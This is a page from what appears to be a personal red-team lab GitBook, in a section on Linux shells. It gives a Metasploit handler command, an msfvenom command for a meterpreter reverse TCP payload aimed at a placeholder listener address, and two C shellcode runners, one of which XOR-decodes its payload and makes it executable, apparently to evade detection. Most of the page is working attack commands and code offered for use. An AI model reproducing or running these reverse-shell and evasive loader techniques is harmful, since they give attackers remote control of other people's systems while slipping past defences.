AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Basic Linux Reverse Shell
  • Encrypted Linux Reverse Shell

Was this helpful?

  1. Offensive Cyberz
  2. Linux

Shells

Basic Linux Reverse Shell

Configure Listener

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.X.Y; set LPORT 443; exploit -j"

  • Configure a payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c

  • Create a wrapper called hack.c

hack.c
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  

// msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c  
unsigned char buf[] ="\x48\x31"  
  
int main (int argc, char **argv)  
{  
 // Run our shellcode  
 int (*ret)() = (int(*)())buf;  
 ret();  
}

Compile the code with gcc

gcc -o hack.out hack.c -z execstack

Encrypted Linux Reverse Shell

encrypted_xor.c
#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdio.h>
#include <dlfcn.h>
#include <unistd.h>

// compile with - gcc -o final.out encrypted_xor.c -z execstack
// msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.X.Y -f c   -encrypt xor -encrypt-key J

unsigned char buf[] = "\x02\x7b\xb5\x20\x43\x12\xd3....";

int main(int argc, char** argv)
{
    if (fork() == 0)
    {
    char xor_key = 'J';
	int arraysize = (int)sizeof(buf);
	for (int i = 0; i < arraysize - 1; i++)
	{
		buf[i] = buf[i] ^ xor_key;
	}

    intptr_t pagesize = sysconf(_SC_PAGESIZE);
    if (mprotect((void*)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ | PROT_EXEC))
		{
            perror("mprotect");
            return -1;
        }
    int (*ret)() = (int(*)())buf;
    ret();
    }
    else
    {
        printf("done");
    }
    return 3;
}
PreviousLinuxNextImpacket

Last updated 3 years ago

Was this helpful?